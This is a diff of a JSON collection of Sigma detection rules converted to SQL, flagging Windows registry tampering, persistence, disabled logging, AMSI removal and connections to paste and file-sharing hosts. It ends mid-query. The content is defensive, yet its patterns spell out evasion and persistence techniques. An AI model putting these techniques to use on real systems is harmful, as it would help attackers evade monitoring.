"ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE 